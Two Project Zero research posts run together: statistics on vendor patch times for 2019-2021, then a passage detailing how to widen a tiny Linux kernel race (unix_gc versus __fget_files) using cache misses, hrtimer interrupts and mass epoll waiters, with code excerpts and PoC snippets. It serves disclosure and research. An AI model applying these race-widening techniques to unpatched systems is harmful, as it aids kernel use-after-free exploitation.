In 2021, vendors took an average of 52 days to fix security vulnerabilities reported by Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.
Overview
For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.
To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.
For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).
There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.
The data!
Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.
Deadline adherence
Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.
In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.
Deadline adherence and fix time 2019-2021, by bug report volume
Vendor | Total bugs | Fixed by day 90 | Fixed during grace period | Exceeded deadline & grace period | Avg days to fix
Apple | 84 | 73 (87%) | 7 (8%) | 4 (5%) | 69
Microsoft | 80 | 61 (76%) | 15 (19%) | 4 (5%) | 83
Google | 56 | 53 (95%) | 2 (4%) | 1 (2%) | 44
Linux | 25 | 24 (96%) | 0 (0%) | 1 (4%) | 25
Adobe | 19 | 15 (79%) | 4 (21%) | 0 (0%) | 65
Mozilla | 10 | 9 (90%) | 1 (10%) | 0 (0%) | 46
Samsung | 10 | 8 (80%) | 2 (20%) | 0 (0%) | 72
Oracle | 7 | 3 (43%) | 0 (0%) | 4 (57%) | 109
Others* | 55 | 48 (87%) | 3 (5%) | 4 (7%) | 44
TOTAL | 346 | 294 (84%) | 34 (10%) | 18 (5%) | 61
* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.
Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).
Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a small sample size of only 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.
Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:
Bug fix time 2019-2021, by bug report volume
Vendor | Bugs in 2019 (avg days to fix) | Bugs in 2020 (avg days to fix) | Bugs in 2021 (avg days to fix)
Apple | 61 (71) | 13 (63) | 11 (64)
Microsoft | 46 (85) | 18 (87) | 16 (76)
Google | 26 (49) | 13 (22) | 17 (53)
Linux | 12 (32) | 8 (22) | 5 (15)
Others* | 54 (63) | 35 (54) | 14 (29)
TOTAL | 199 (67) | 87 (54) | 63 (52)
* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.
From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, most significantly between 2019 and 2020. Microsoft, Apple, and Linux have all reduced their time to fix over the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the vendors not broken out individually have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.
Finally, focusing on just 2021, we see:
Only 1 deadline exceeded, versus an average of 9 per year in the other two years
The grace period was used 9 times (notably, about half of them by Microsoft), versus an average of 12.5 uses per year in the other two years
Mobile phones
Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.
Vendor | Total bugs | Avg fix time (days)
iOS | 76 | 70
Android (Samsung) | 10 | 72
Android (Pixel) | 6 | 72
The first thing to note is that iOS received far more bug reports from Project Zero than any flavor of Android did during this time period. Rather than an imbalance in research target selection, this is largely a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.
Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc.). However, open-source products do provide a window into where time is spent.
Browsers
For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.
Fix time analysis for open-source browsers, by bug volume
Browser | Bugs | Avg days from bug report to public patch | Avg days from public patch to release | Avg days from bug report to release
Chrome | 40 | 5.3 | 24.6 | 29.9
WebKit | 27 | 11.6 | 61.1 | 72.7
Firefox | 8 | 16.6 | 21.1 | 37.8
Total | 75 | 8.8 | 37.3 | 46.1
We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):
The table and chart together tell us a few things:
Chrome is currently the fastest of the three browsers, averaging 30 days from bug report to a fix shipping in the stable channel. The time to patch is very fast here, with an average of just 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public makes up the bulk of the overall window, though we still see the Chrome (blue) bars toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)
Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.
WebKit is the outlier in this analysis, with the longest time from bug report to release at 73 days. Its time to land the fix publicly falls between Chrome and Firefox, but unfortunately this leaves a very long window for opportunistic attackers to find the patch and exploit it before the fix is made available to users. This can be seen in the Apple (red) bars of the second histogram mostly sitting on the right side of the graph, with all but one of them past the 30-day mark.
Analysis, hopes, and dreams
Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patching, effectively reducing the overall average time to fix to about 52 days. In 2021, only one 90-day deadline was exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.
One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.
For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.
For Apple, we're pleased with the acceleration of patches landing, as well as the recent absence of grace-period use and missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used on iOS, as WebKit is the only browser engine permitted on the platform.
For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.
Moving forward
This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.
To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.
How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:
use a cache miss to widen the race window a little bit
make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll
Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.
Introduction
I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT (which, when enabled, makes it possible to preempt a thread with another thread, as I described at LSSEU2019).
This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.
This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.
In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.
When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)
One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:
While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:
And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:
The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.
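To make that concrete, here's a simplified sketch of the pattern the fix uses (a paraphrase, not the literal upstream patch; the helper names match the kernel functions discussed above):

static struct file *fget_rcu_sketch(struct files_struct *files, unsigned int fd,
                                    unsigned int refs)
{
        /* Sketch only: after bumping the refcount, re-check that the FD table
         * entry still points at the same file - only a live FD table entry
         * guarantees that the file is live. */
        for (;;) {
                struct file *file = files_lookup_fd_rcu(files, fd);
                if (!file)
                        return NULL;
                if (!get_file_rcu_many(file, refs))
                        continue;              /* refcount was already zero: retry the lookup */
                if (files_lookup_fd_rcu(files, fd) == file)
                        return file;           /* FD table entry unchanged => reference is live */
                fput_many(file, refs);         /* entry changed under us: drop our refs and retry */
        }
}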
[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]
My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:
[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]
The race
There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:
static struct file *__fget_files(struct files_struct *files, unsigned int fd,
                                 fmode_t mask, unsigned int refs)
{
        struct file *file;
        rcu_read_lock();
loop:
        file = files_lookup_fd_rcu(files, fd); // race window start
        if (file) {
                if (file->f_mode & mask)
                        file = NULL;
                else if (!get_file_rcu_many(file, refs)) // race window end
                        goto loop;
        }
        rcu_read_unlock();
        return file;
}
In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").
In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:
<__fget_files+0x4e> je ffffffff812e3def <__fget_files+0x6f>
<__fget_files+0x50> lea rcx,[rsi+rax*1]
<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)
As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.
Missing some cache
Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)
For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).
However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.
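As a rough illustration (not the author's PoC), the cache-line bounce plus warm-up run might look like the following; pin_to() is the CPU-pinning helper that also appears in the patch excerpt further down, while victim_fd and warmup_fd are made-up names:

/* Dirty the victim file's refcount cache line on another core, then warm up
 * the dup() path and the FD-table cache line on the racing core shortly
 * before the race attempt. */
pin_to(2);
close(dup(victim_fd));          /* refcount bounce: cache line is now dirty on CPU 2 */
pin_to(1);
close(dup(warmup_fd));          /* warm-up dup(); warmup_fd shares the victim's FD-table cache line */
/* ... spin until the planned launch time, then: */
int raced_fd = dup(victim_fd);  /* the dup() we are trying to interrupt inside __fget_files() */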
An interruption
Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?
On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.
One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.
(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)
Setting an alarm
A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).
High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.
The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...
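A minimal sketch of arming such a timer through timerfd (launch_ts, the precomputed absolute expiry time, is assumed to come from the race-timing logic):

#include <sys/timerfd.h>
#include <time.h>

/* Arm a one-shot absolute CLOCK_MONOTONIC hrtimer via timerfd; launch_ts is
 * the planned expiry time, computed elsewhere. */
static int arm_abs_timer(struct timespec launch_ts)
{
        int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
        struct itimerspec its = { .it_value = launch_ts };  /* absolute, no interval */
        timerfd_settime(tfd, TFD_TIMER_ABSTIME, &its, NULL);
        return tfd;
}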
[Sidenote] Absolute timers: Not quite absolute
So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter (TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).
However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.
Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)
A really big list of things to do
Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?
Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.
Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.
When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.
And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
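A sketch of that amplification (tfd would be the timerfd from the previous section; the 500/100 counts mirror the setup described here, and all names are illustrative):

#include <sys/epoll.h>
#include <unistd.h>

#define NUM_DUPS   100
#define NUM_EPOLLS 500

/* Pile ~50,000 waiters onto one timerfd by combining duplicated FD numbers
 * with many epoll instances. */
static void add_waiters(int tfd)
{
        int dups[NUM_DUPS];
        for (int i = 0; i < NUM_DUPS; i++)
                dups[i] = dup(tfd);                    /* epoll keys its watches by FD number */
        for (int i = 0; i < NUM_EPOLLS; i++) {
                int ep = epoll_create1(0);
                for (int j = 0; j < NUM_DUPS; j++) {
                        struct epoll_event ev = { .events = EPOLLIN };
                        epoll_ctl(ep, EPOLL_CTL_ADD, dups[j], &ev);
                }
        }
        /* 500 epoll instances x 100 duplicate FDs = 50,000 waitqueue entries
         * that the hardirq-context wake_up() has to walk when the timer fires. */
}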
Measuring race outcomes
A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused (a code sketch of this classification follows the list):
If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
If dup() returns a file descriptor:
If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
If it returns the old victim FD number:
If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
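The classification might be sketched like this (victim_fd is the FD that was close()d during the race, raced_fd is dup()'s return value; the names and the recv() details are illustrative):

#include <sys/socket.h>

enum outcome { DUP_TOO_LATE, DUP_TOO_EARLY, DUP_SLIGHTLY_EARLY, RACE_SUCCESS };

static enum outcome classify(int victim_fd, int raced_fd)
{
        char buf[64];
        if (raced_fd == -1)
                return DUP_TOO_LATE;       /* file* was already gone from the FD table */
        if (raced_fd > victim_fd)
                return DUP_TOO_EARLY;      /* close() came after refcount bump + FD allocation */
        /* dup() returned the old victim FD number: did the GC eat the queued SKB? */
        if (recv(raced_fd, buf, sizeof(buf), MSG_DONTWAIT) <= 0)
                return RACE_SUCCESS;       /* no data: the GC wrongly removed the SKB */
        return DUP_SLIGHTLY_EARLY;         /* interrupt hit between refcount bump and FD allocation */
}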
Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.
Results: Debian kernel, on Tiger Lake
I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.
Results: Other kernel, on Skylake
These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)
The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!
How important is the cache miss?
The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):
@@ -312,8 +312,10 @@
}
+#if 0
// bounce socket's file refcount over to other cpu
pin_to(2);
close(SYSCHK(dup(RESURRECT_FD+1-1)));
pin_to(1);
+#endif
//printf("setting timer\n");
@@ -352,5 +354,5 @@
close(loop_root);
while (ts_is_in_future(spin_stop))
- close(SYSCHK(dup(FAKE_RESURRECT_FD)));
+ close(SYSCHK(dup(RESURRECT_FD)));
while (ts_is_in_future(my_launch_ts)) /*spin*/;
With that patch, the race outcomes look like this on the Tiger Lake laptop:
But wait, those graphs make no sense!
If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):
Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:
But what the graphs are showing is more of a smooth, linear transition, like this:
And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.
So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?
I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:
As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:
This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.
But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):
So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.
Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.
The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?
The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:
Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.
(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)
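As a sketch of the second option, the launch time used by the spinloop can be shifted down to the previous LAPIC clock edge, assuming (as measured above) that edges fall on multiples of the TSC / core crystal clock ratio:

#include <stdint.h>

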